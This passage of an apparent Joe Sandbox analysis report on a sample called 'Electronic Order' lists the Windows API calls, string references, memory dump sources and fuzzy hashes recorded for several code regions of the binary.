                                      • GetDlgCtrlID.USER32 ref: 00E195EA
                                      • GetParent.USER32 ref: 00E19606
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E19609
                                      • GetDlgCtrlID.USER32(?), ref: 00E19612
                                      • GetParent.USER32(?), ref: 00E1962E
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E19631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 9ac0fe2ef5721266583f7851432afb00cddab2dbd963bf2d5f59b4d6c959428c
                                      • Instruction ID: 0e4dd3ef8be1031fef74e6143653dcaf93d5fcf162683bcc1b49970198612823
                                      • Opcode Fuzzy Hash: 9ac0fe2ef5721266583f7851432afb00cddab2dbd963bf2d5f59b4d6c959428c
                                      • Instruction Fuzzy Hash: 5921CF74E00204BFDF00ABA1CC95EFEBBA8EF49300F114059F921A72A2DB7599599B70
                                      APIs
                                      • GetParent.USER32 ref: 00E19651
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E19666
                                      • _wcscmp.LIBCMT ref: 00E19678
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E196F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: dc3bdd0a29a35da4da8e434dfd91127b8354fc97f165eaa10c27418676e48d21
                                      • Instruction ID: 6e6a5e0e12d952c2d81e95483f7129b0087c9b3d54724e08b99a12d0a6818d09
                                      • Opcode Fuzzy Hash: dc3bdd0a29a35da4da8e434dfd91127b8354fc97f165eaa10c27418676e48d21
                                      • Instruction Fuzzy Hash: E7113A36248313BAFA063621DC2ADE6779CDF01764B201026F904B60D3FE5169814678
                                      APIs
                                      • __swprintf.LIBCMT ref: 00E2419D
                                      • __swprintf.LIBCMT ref: 00E241AA
                                        • Part of subcall function 00DE38D8: __woutput_l.LIBCMT ref: 00DE3931
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E241D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 00E241E0
                                      • LockResource.KERNEL32(00000000), ref: 00E241ED
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00E2420D
                                      • LoadResource.KERNEL32(?,00000000), ref: 00E2421F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00E2422E
                                      • LockResource.KERNEL32(?), ref: 00E2423A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E2429B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: d5e1b6eb5d0349f3f0af5982ce39930888d8ebb912a0c85377a8c560b30a1d3f
                                      • Instruction ID: f3ab323f4370f484c8cf76a1a0ebdc659822ed8edee22f36a5315471b720d723
                                      • Opcode Fuzzy Hash: d5e1b6eb5d0349f3f0af5982ce39930888d8ebb912a0c85377a8c560b30a1d3f
                                      • Instruction Fuzzy Hash: B43182B650522AAFDB119FA2EC48EBF7BACEF05705F004525F905F21A0D770DA618BB4
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DCFC06
                                      • OleUninitialize.OLE32(?,00000000), ref: 00DCFCA5
                                      • UnregisterHotKey.USER32(?), ref: 00DCFDFC
                                      • DestroyWindow.USER32(?), ref: 00E04A00
                                      • FreeLibrary.KERNEL32(?), ref: 00E04A65
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E04A92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 884aa6eca17a34b69246ea5e981b65816a94a978f390aa5fc5d36f0d7e4cf673
                                      • Instruction ID: 3eb6c353c55ee127bdfbc7dfd042099f5b050ee6b2f9f72ae351898b7ef21398
                                      • Opcode Fuzzy Hash: 884aa6eca17a34b69246ea5e981b65816a94a978f390aa5fc5d36f0d7e4cf673
                                      • Instruction Fuzzy Hash: CAA16AB07012128FCB29EF55C594F69F7A5EF04700F1452ADE90AAB2A2DB30ED56CF64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-218231672
                                      • Opcode ID: 72230b9b50dc436e5db87e2abdb5c20c38a944564d6f5f81b19ac2578019065c
                                      • Instruction ID: 5df22b40517a769f89f56fada94fdc6c2b0ae1dafee8ded9aba59e35759d3b4b
                                      • Opcode Fuzzy Hash: 72230b9b50dc436e5db87e2abdb5c20c38a944564d6f5f81b19ac2578019065c
                                      • Instruction Fuzzy Hash: 3791E071A00215AFDF24DFA5C889FAEBBB8EF85314F109059F515BB282D7B09945CFA0
                                      APIs
                                      • EnumChildWindows.USER32(?,00E1AA64), ref: 00E1A9A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 17421a25e25b5598a8991215ae0ff5d86f281f9c7d959fe9a3ea7e2fef7b4219
                                      • Instruction ID: f1a2ad53aac47006d5770cc25213f79cbf30f4f062adb95a8d65d0738fe7afab
                                      • Opcode Fuzzy Hash: 17421a25e25b5598a8991215ae0ff5d86f281f9c7d959fe9a3ea7e2fef7b4219
                                      • Instruction Fuzzy Hash: BB919230601646AADB08EF60D482BF9FB75FF44314F189129D89AB7151DB306AD9CBB1
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00DC2EAE
                                        • Part of subcall function 00DC1DB3: GetClientRect.USER32(?,?), ref: 00DC1DDC
                                        • Part of subcall function 00DC1DB3: GetWindowRect.USER32(?,?), ref: 00DC1E1D
                                        • Part of subcall function 00DC1DB3: ScreenToClient.USER32(?,?), ref: 00DC1E45
                                      • GetDC.USER32 ref: 00DFCF82
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DFCF95
                                      • SelectObject.GDI32(00000000,00000000), ref: 00DFCFA3
                                      • SelectObject.GDI32(00000000,00000000), ref: 00DFCFB8
                                      • ReleaseDC.USER32(?,00000000), ref: 00DFCFC0
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DFD04B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 657682f02a3eb1ba4d6475602ed43afdb26c96a7d76fe4bbf84d84fd5cbbf2bd
                                      • Instruction ID: 2f41ef2c707642ea15c47fbf0a99a68e07225a7df56b6a8f1292115bd009d6e0
                                      • Opcode Fuzzy Hash: 657682f02a3eb1ba4d6475602ed43afdb26c96a7d76fe4bbf84d84fd5cbbf2bd
                                      • Instruction Fuzzy Hash: C271A230500209DFCF259F64C984ABA7BB6FF49350F19826AFE55AB1A6C7318852DB70
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E4F910), ref: 00E3903D
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E4F910), ref: 00E39071
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E391EB
                                      • SysFreeString.OLEAUT32(?), ref: 00E39215
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 196d7643b90c93a4d93e75960297c5cdb2a3eab8a890852a51a0556235296e85
                                      • Instruction ID: 0cf7f682ea590fbe3f2d53333c54b6de8999ac7b80f0730d8a876523926512b0
                                      • Opcode Fuzzy Hash: 196d7643b90c93a4d93e75960297c5cdb2a3eab8a890852a51a0556235296e85
                                      • Instruction Fuzzy Hash: 41F11A75A00209EFDB04DF94C888EAEBBB9FF89314F108059F515BB251DB71AE45CB60
                                      APIs
                                      • _memset.LIBCMT ref: 00E3F9C9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FB5C
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FB80
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FBC0
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E3FBE2
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E3FD5E
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E3FD90
                                      • CloseHandle.KERNEL32(?), ref: 00E3FDBF
                                      • CloseHandle.KERNEL32(?), ref: 00E3FE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: c6e7815602cf2dac3d00dcb1e1cc2acf392a1dfc2817bf82f95a4a1af57c4b63
                                      • Instruction ID: a932ef4352a9afe7deb3921c38ee12b03965daa3668b5d3b58c1bb0c1b6e0784
                                      • Opcode Fuzzy Hash: c6e7815602cf2dac3d00dcb1e1cc2acf392a1dfc2817bf82f95a4a1af57c4b63
                                      • Instruction Fuzzy Hash: 74E1C331604341DFCB14EF25C899B6ABBE1EF84714F14956DF899AB2A2CB30DC45CB62
                                      APIs
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E238D3,?), ref: 00E248C7
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E238D3,?), ref: 00E248E0
                                        • Part of subcall function 00E24CD3: GetFileAttributesW.KERNEL32(?,00E23947), ref: 00E24CD4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E24FE2
                                      • _wcscmp.LIBCMT ref: 00E24FFC
                                      • MoveFileW.KERNEL32(?,?), ref: 00E25017
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: 68e27d5898586662696ef97253e6e604dd4e1c9bb2ee23b72e7d63569e9d874f
                                      • Instruction ID: ccd90a91452f2a824399dd3f628fdf0650bf67ea6c340071239e0442947c2e56
                                      • Opcode Fuzzy Hash: 68e27d5898586662696ef97253e6e604dd4e1c9bb2ee23b72e7d63569e9d874f
                                      • Instruction Fuzzy Hash: D25143B20087959BD724EB60DC819DFB3ECEF85341F00592EF185E3191EE74A6888B76
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E4896E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 629babccd5cbc53cbf9fcc1c0a05815e4a986a124071c0eb8f471a5f008a2635
                                      • Instruction ID: c949a33e1531fe21ba58ad1c66a66dc20327e7f3f2cd403a47bf6435ec7d68cd
                                      • Opcode Fuzzy Hash: 629babccd5cbc53cbf9fcc1c0a05815e4a986a124071c0eb8f471a5f008a2635
                                      • Instruction Fuzzy Hash: F651E530500204BFDF349F25EE85BAD7BA5FB05354F606116F614F65A0CFB1A980DB91
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DFC547
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DFC569
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DFC581
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DFC59F
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DFC5C0
                                      • DestroyIcon.USER32(00000000), ref: 00DFC5CF
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DFC5EC
                                      • DestroyIcon.USER32(?), ref: 00DFC5FB
                                        • Part of subcall function 00E4A71E: DeleteObject.GDI32(00000000), ref: 00E4A757
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 33845584564ec560bf309182f46193a1f60c313558ed3147709971df7d61a307
                                      • Instruction ID: 5db5a018e1836ff62533ef81c97d335698f04dd4119bfecaef92586dc0ac9f44
                                      • Opcode Fuzzy Hash: 33845584564ec560bf309182f46193a1f60c313558ed3147709971df7d61a307
                                      • Instruction Fuzzy Hash: B1519874A1020AAFDB24DF25DC45FBA3BB5EB48720F14452CF946A72A0DB70ED90DB60
                                      APIs
                                        • Part of subcall function 00E1AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1AE77
                                        • Part of subcall function 00E1AE57: GetCurrentThreadId.KERNEL32 ref: 00E1AE7E
                                        • Part of subcall function 00E1AE57: AttachThreadInput.USER32(00000000,?,00E19B65,?,00000001), ref: 00E1AE85
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19B70
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E19B8D
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E19B90
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19B99
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E19BB7
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E19BBA
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E19BC3
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E19BDA
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E19BDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: 2168c2f53b5885f18a615e6361ce16f6ac37ef12217a1ed3ef3eb47434941d9d
                                      • Instruction ID: e906dd2ff043f0a4b175d6d71fe5dfa538a7bd187e95457c410a4fba7501660f
                                      • Opcode Fuzzy Hash: 2168c2f53b5885f18a615e6361ce16f6ac37ef12217a1ed3ef3eb47434941d9d
                                      • Instruction Fuzzy Hash: 9D1144B5940208BEF6102F21DC89FAA3F6CEB0DB51F110425F204BB1A1C9F35C91DAA4
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E0C
                                      • HeapAlloc.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E13
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E18A84,00000B00,?,?), ref: 00E18E28
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E30
                                      • DuplicateHandle.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E33
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E18A84,00000B00,?,?), ref: 00E18E43
                                      • GetCurrentProcess.KERNEL32(00E18A84,00000000,?,00E18A84,00000B00,?,?), ref: 00E18E4B
                                      • DuplicateHandle.KERNEL32(00000000,?,00E18A84,00000B00,?,?), ref: 00E18E4E
                                      • CreateThread.KERNEL32(00000000,00000000,00E18E74,00000000,00000000,00000000), ref: 00E18E68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: b3300dc8eb5ca4c056fa0b8e08cb996b68447d455e67e53f5056fe973305c0c9
                                      • Instruction ID: 9948d8fcdab1c4caafb93d9a978ae26871249c139e5db07c96eed07d787278fb
                                      • Opcode Fuzzy Hash: b3300dc8eb5ca4c056fa0b8e08cb996b68447d455e67e53f5056fe973305c0c9
                                      • Instruction Fuzzy Hash: C301BF79641304FFE710ABA5DC4DF573BACEB89B11F004421FA05EB2A2CA70D805CB60
                                      APIs
                                        • Part of subcall function 00E17652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?,?,00E1799D), ref: 00E1766F
                                        • Part of subcall function 00E17652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E1768A
                                        • Part of subcall function 00E17652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E17698
                                        • Part of subcall function 00E17652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?), ref: 00E176A8
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E39B1B
                                      • _memset.LIBCMT ref: 00E39B28
                                      • _memset.LIBCMT ref: 00E39C6B
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E39C97
                                      • CoTaskMemFree.OLE32(?), ref: 00E39CA2
                                      Strings
                                      • NULL Pointer assignment, xrefs: 00E39CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: d8a95db168dc407eb8a1cb0eb0a18d4517f04157e55c0dda7351a57c24c18ab0
                                      • Instruction ID: bc49d688db7592d862527a3b576b304ccf445d6f41164eba5ba3a6a4c7c3c8b3
                                      • Opcode Fuzzy Hash: d8a95db168dc407eb8a1cb0eb0a18d4517f04157e55c0dda7351a57c24c18ab0
